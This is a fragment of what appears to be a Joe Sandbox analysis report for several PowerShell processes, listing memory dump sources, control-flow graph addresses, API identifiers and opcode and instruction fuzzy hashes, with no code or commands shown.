                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA31C77190E7884FDB59EB68845A6ED7FE0EF56320F0441AFC049DB1A3DA68580AC751

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 66 7ff8488ee098-7ff8488f05a4 ResumeThread 73 7ff8488f05a6 66->73 74 7ff8488f05ac-7ff8488f05d1 66->74 73->74
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2339084545.00007FF8488E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488E0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8488e0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                                  • Opcode ID: c74c24e19dea6ae41c443e0b2202ebc6287a5eef134242909e324101f264f419
                                                                                                                                                                                                  • Instruction ID: 126c152f368b23875c009d8688fbf98c51231516747e04b1c5c8febd83a4213c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c74c24e19dea6ae41c443e0b2202ebc6287a5eef134242909e324101f264f419
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8631E671A0DB4C8FDB59EFA8844A6FD7BE0EF66320F0441AFD04AD7162CA785806CB51

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 98 7ff8489b24c4-7ff8489b24f4 103 7ff8489b24f6-7ff8489b251d 98->103 104 7ff8489b251f-7ff8489b2547 98->104 103->104 109 7ff8489b2549 104->109 110 7ff8489b254e-7ff8489b255f 104->110 109->110 112 7ff8489b254b 109->112 113 7ff8489b2561 110->113 114 7ff8489b2566-7ff8489b25ff 110->114 112->110 113->114 115 7ff8489b2563 113->115 119 7ff8489b2605-7ff8489b260f 114->119 120 7ff8489b27cf-7ff8489b282d 114->120 115->114 121 7ff8489b2611-7ff8489b261f 119->121 122 7ff8489b2629-7ff8489b262f 119->122 146 7ff8489b2858-7ff8489b287d 120->146 147 7ff8489b282f-7ff8489b2856 120->147 121->122 132 7ff8489b2621-7ff8489b2627 121->132 124 7ff8489b2764-7ff8489b276e 122->124 125 7ff8489b2635-7ff8489b2638 122->125 130 7ff8489b2770-7ff8489b2780 124->130 131 7ff8489b2781-7ff8489b27cc 124->131 128 7ff8489b2681 125->128 129 7ff8489b263a-7ff8489b264d 125->129 135 7ff8489b2683-7ff8489b2685 128->135 129->120 141 7ff8489b2653-7ff8489b265d 129->141 131->120 132->122 135->124 139 7ff8489b268b-7ff8489b268e 135->139 139->124 143 7ff8489b2694-7ff8489b2697 139->143 148 7ff8489b2676-7ff8489b2679 141->148 149 7ff8489b265f-7ff8489b2674 141->149 144 7ff8489b2699-7ff8489b26ad 143->144 145 7ff8489b26be-7ff8489b26c2 143->145 144->145 145->124 157 7ff8489b26c8-7ff8489b26d6 145->157 164 7ff8489b2889-7ff8489b2895 146->164 165 7ff8489b287f-7ff8489b2885 146->165 147->146 153 7ff8489b267a-7ff8489b267f 148->153 149->148 153->135 157->153 162 7ff8489b26d8-7ff8489b2711 157->162 162->124 177 7ff8489b2713-7ff8489b2719 162->177 168 7ff8489b28a1-7ff8489b293f 164->168 169 7ff8489b2897-7ff8489b289d 164->169 165->164 169->168 178 7ff8489b271b-7ff8489b2736 177->178 179 7ff8489b2738-7ff8489b274e 177->179 178->179 181 7ff8489b2754-7ff8489b2763 179->181
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2342637901.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8489b0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: be4d2b8973f226ad9e28b7f68a22e54c8d554c70abb0a6017d3d85f02db9ba02
                                                                                                                                                                                                  • Instruction ID: 41cb71720b377dd188735c9224608944e10034a59912a7f929318c27038218d5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: be4d2b8973f226ad9e28b7f68a22e54c8d554c70abb0a6017d3d85f02db9ba02
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AF10521E0EBC95FE39AAB7858591B47FE1FF66661F0901FBD049CB093DA089C06C356

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2342637901.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8489b0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e2a8c0ee9c5292112bb80e63a52898ef0ed621d99893cc582f5d8cad62910305
                                                                                                                                                                                                  • Instruction ID: 5c5886124a99905d7e8688740cb75065f65aa00975998ad9aa2264734997fe2f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2a8c0ee9c5292112bb80e63a52898ef0ed621d99893cc582f5d8cad62910305
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB51D722E1EF8A5FFBA9F62C18596B96AD1FF65791F4801BAD40DC71C3DE08AC044345

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2342637901.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8489b0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: b86650c7089030e51bd0887c4296172f852793a6ea3f8dc5d5f28ce63a4696ed
                                                                                                                                                                                                  • Instruction ID: 1b9f47376c5c402edff8cf3885df8a7d4dbbf09dacb5de714bc4111de67ad011
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b86650c7089030e51bd0887c4296172f852793a6ea3f8dc5d5f28ce63a4696ed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5531B022E1FE86AFF7A9B22C186917869D1FFA56D2F4801BAD40DC75D3DE0C6C444219

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2342637901.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8489b0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ed9a30851255b7751cf27b95db34c1629e6d788b2c5ff95b4a289935b2f7871c
                                                                                                                                                                                                  • Instruction ID: 003d0d9469385706e0a4063b18d101154bf3070e0f92419aabc1ab30354baae5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed9a30851255b7751cf27b95db34c1629e6d788b2c5ff95b4a289935b2f7871c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23210432E0DF858FE76DAA6854991797BD2FF55292F0801BFD04AC3092CF1558418708
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2342637901.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8489b0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3e50f1c10f9915c10615477ad3cf67ded164acb8db28b90c4679eeb349705172
                                                                                                                                                                                                  • Instruction ID: 0e9a88166fe0f0a9b4d7fe13d7b6fdffb6465ab5bb7af90f52b8f0679bc9f592
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e50f1c10f9915c10615477ad3cf67ded164acb8db28b90c4679eeb349705172
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18F02722F0ED5A6FF7A9B62C381D2F45AD1EF659A0F0806B7C509C728EDE089C190385
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2339084545.00007FF8488E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488E0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8488e0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d648009b504aed04fa36359a1775190bbcff4ef9958749e964f47f958c290736
                                                                                                                                                                                                  • Instruction ID: b9c10206cd5cfc70413507d68b07eb2da01cde4c81a4f7da61cce1019cadaf75
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d648009b504aed04fa36359a1775190bbcff4ef9958749e964f47f958c290736
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6812E530A0DA895FD759EB38C859BB97BE1EF46350F0401FED45EC72A2DE28A846C741
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2339084545.00007FF8488E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488E0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8488e0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: daf80d5f8bf14327c003fb6c2267d0988c5fccc09f5f5f484ac742ff14e72327
                                                                                                                                                                                                  • Instruction ID: a1051d83abc8dc28dadd0a1805d8c8f412b5532112f0a3fc4aed1938e2abea5a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: daf80d5f8bf14327c003fb6c2267d0988c5fccc09f5f5f484ac742ff14e72327
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D318B7161DB4C1FD31CAB38981A0BABBE5DB8722071582BFD087C72A3DD2968078385
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2339084545.00007FF8488E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488E0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8488e0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e7051bc49df75fa51aaeb9405025a9c2ee077342b2ce97969d41ea023becc081
                                                                                                                                                                                                  • Instruction ID: 27c6ff74632d6ef2b519aba13d11f2eafd41cc42b11c24bfaf80936910dcd29b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7051bc49df75fa51aaeb9405025a9c2ee077342b2ce97969d41ea023becc081
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C21F77160E7881FD31D9A74482A53ABFA5DB83210B0682FFD093CB1E3DE18580B8791
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.2415461224.00007FF8489A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff8489a0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: feedc982822aaf2bdac6d3657ebd74c91912e3dca1a9bacd376192d893cce067
                                                                                                                                                                                                  • Instruction ID: 7c38fb5364f28a1f7c4d495644bbd755f196bb096e04c7a4393d4137aae8779e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: feedc982822aaf2bdac6d3657ebd74c91912e3dca1a9bacd376192d893cce067
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4511922E1EFC69FFBA9B62C18692B97AE1EF55791F0801BAC40DC75C3DE08AC044345
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.2415461224.00007FF8489A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff8489a0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f684f2a3470922eb7eb7bfa52eea2e5e9d885c87703a0c1f251faca57d13a904
                                                                                                                                                                                                  • Instruction ID: b6211955e09465ed5aec232511e820cdf3b96954d9431e7b2eaee8f15bdbbac7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f684f2a3470922eb7eb7bfa52eea2e5e9d885c87703a0c1f251faca57d13a904
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A731A222E1FFC6AFF6A9B22C186917869E1EF556E2F4801BAD40DC75D3DE0C6C444219
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.2413067867.00007FF8488D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488D0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff8488d0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c46ff55438e746d094abfbddbb3634bca15ade2bfa752f3f13430675916bd83e
                                                                                                                                                                                                  • Instruction ID: 6600433ec041ce2ba22bc9ad7d51d7ab592c58ccd3f1ecea41251da3649bfc50
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c46ff55438e746d094abfbddbb3634bca15ade2bfa752f3f13430675916bd83e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1315031F1DA8A0FD359FB389C595A177D1DF85240F0982BAD049C76E7DE28BC058744
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.2413067867.00007FF8488D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488D0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff8488d0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 089a23602a8113f32f4c120cab3e32ba9517bbcbe2533f2b2b6f75e8e3015937
                                                                                                                                                                                                  • Instruction ID: c4e076fce03717442939c8c7c83985a2b3144ec084d136dd04666e31865d5a31
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 089a23602a8113f32f4c120cab3e32ba9517bbcbe2533f2b2b6f75e8e3015937
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3112C21F1C8474FE358B63C45452BD66C2DBD5391F04827AC449CBADBDE28980547C4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.2413067867.00007FF8488D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488D0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff8488d0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                  • Instruction ID: 13bab17c6ec452b31232209166c5da659f3df39c5668744a9c64254c6d2a4d2f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC01677121CB0D4FD744EF0CE451AAAB7E0FB95364F10056DE58AC3655D736E882CB45
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.2415461224.00007FF8489A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff8489a0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 24644c21da12832f4e9094a08472bce59ce7e30ba66e2cf06b7279c0dd69b521
                                                                                                                                                                                                  • Instruction ID: 4c964d0d0660ed3bd6a375e2898576cc84d7a440f39e42d480f11c40718fa03d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24644c21da12832f4e9094a08472bce59ce7e30ba66e2cf06b7279c0dd69b521
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5F0B432B1CA484FE79CEA1C945517AB7D2FB99166B09417FD14EC3562DB21A8024704
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.2415461224.00007FF8489A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff8489a0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d81df147af0b746fbd89677dda8d0ef7ee6fd38674c7047ead532f4f9234736e
                                                                                                                                                                                                  • Instruction ID: 1f0b98feea7bd3462a62802a96741354c33933db83bd4ff1b9ab42e7ce8c9207
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d81df147af0b746fbd89677dda8d0ef7ee6fd38674c7047ead532f4f9234736e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF05223F0EE9A1FF7A5A22C381D2F46BC1DF849A1B1802B7C50EC3286DE088C180384
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.2413067867.00007FF8488D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488D0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff8488d0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 82af515c0c8c9ad72d9ee17629b6441ba60c76668e35f83d0d863c7c984f8f36
                                                                                                                                                                                                  • Instruction ID: 83b1e08e32a1848f909346793cc40aa8c8f59210f64da3ab08636d47569407d7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82af515c0c8c9ad72d9ee17629b6441ba60c76668e35f83d0d863c7c984f8f36
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EF01774E0820BCFDB00EFA4C4815AEB7F1EF44351F204526C015EA281EB38AA448F84
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.2413067867.00007FF8488D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488D0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff8488d0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 17e1ff58fb328a8e687e078af46aef15ba79f9347d3dd9e121958f92a09831e0
                                                                                                                                                                                                  • Instruction ID: 19e224f3618e0dcdf5e5f733f803985e2f92b2fbdb25b8afb3f3ec920bf61b07
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17e1ff58fb328a8e687e078af46aef15ba79f9347d3dd9e121958f92a09831e0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92D05E31B4CA1D0BD768F52DB40626A73C2DBC8261B858B7FD48EC7645CE29DC8207C4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.2413067867.00007FF8488D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488D0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff8488d0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 41e95b08fa9223c9006984f456108fb1c89ace03a9aada6946b8e1f2c26b3a97
                                                                                                                                                                                                  • Instruction ID: 4524cd091ead8a421297e21770bd9c8f5c3d39481495e3e7e78a05e801e57c9a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41e95b08fa9223c9006984f456108fb1c89ace03a9aada6946b8e1f2c26b3a97
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DBE02612F1C3431FE60CFB3C009613EA1D1AF45280F60117EE45AC22C3CDACA9049B08
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.2415461224.00007FF8489A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489A0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff8489a0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e43701f72fb3bd438503ff9624346d079797b6f838cac4598458b23ec67fa59b
                                                                                                                                                                                                  • Instruction ID: fd2adbe4818ee756d0331cf084a268aef4af5aaf271f08a76f7823250ade08d5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e43701f72fb3bd438503ff9624346d079797b6f838cac4598458b23ec67fa59b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3C02B20807547DCF63C32742C450793470CFD9391FC84832C500003467D5E01C0C383
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.2413067867.00007FF8488D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488D0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff8488d0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
                                                                                                                                                                                                  • Instruction ID: 3809e3a945d7137a460a0706c17459faba208bc7bd6847217b3db009cadaae64
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44C0803161C1114FD63DA524401113571F7FB45105B21907DDD87575D6CF396C01CF49
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.2413067867.00007FF8488D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488D0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff8488d0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 850affbbfadb6aabf14209831b7ff8e3f629e0223185a239b529c449ce96534e
                                                                                                                                                                                                  • Instruction ID: 53425411e6e7af20708ce49ecb7783a408a9145bacb3da6020cb1f9a399f8cce
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 850affbbfadb6aabf14209831b7ff8e3f629e0223185a239b529c449ce96534e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8A02208F0C002CBF0803320C0302BC008B8FE03A8F280032820F838C38E0CA808080B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2410046319.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff8489d0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ba201c2094ac9547b79edc3f61d7de2eeecd18017ef2729e51667b37441f1dcc
                                                                                                                                                                                                  • Instruction ID: 40dc786c94c8e1d243c90e1ee9143bb8a93ab2dd2219825afdce08e6d25065d6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba201c2094ac9547b79edc3f61d7de2eeecd18017ef2729e51667b37441f1dcc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7510722E1EE865FFBA9B63C38592B96AD1EF55691F4801BBC40DC71C3DE08AC054749
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2410046319.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff8489d0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 62f80df0a7f5446911a0b2640d382505c75a93dc44331ea582299f3dc492b637
                                                                                                                                                                                                  • Instruction ID: 8171d6fa250150ada8bd772c001dfdd809c37ff352716f321ebd227c838f8620
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62f80df0a7f5446911a0b2640d382505c75a93dc44331ea582299f3dc492b637
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1531B022E1FE866FFAA9B63C286917869D1EF556D2F4801BAD40DC31D3DE0CAC44461D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 27d796dbeeff7c5294459723266b789e29f9918bae1d7176599655443e6c0e21
                                                                                                                                                                                                  • Instruction ID: 6d809274c9660272596636417e3f393efc510b832c12d364b68717af7d5b0f98
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27d796dbeeff7c5294459723266b789e29f9918bae1d7176599655443e6c0e21
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A312931D1DE890FD35AFB3888595A17FD2DF86241B0982BED049C72E7EE2878058354
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
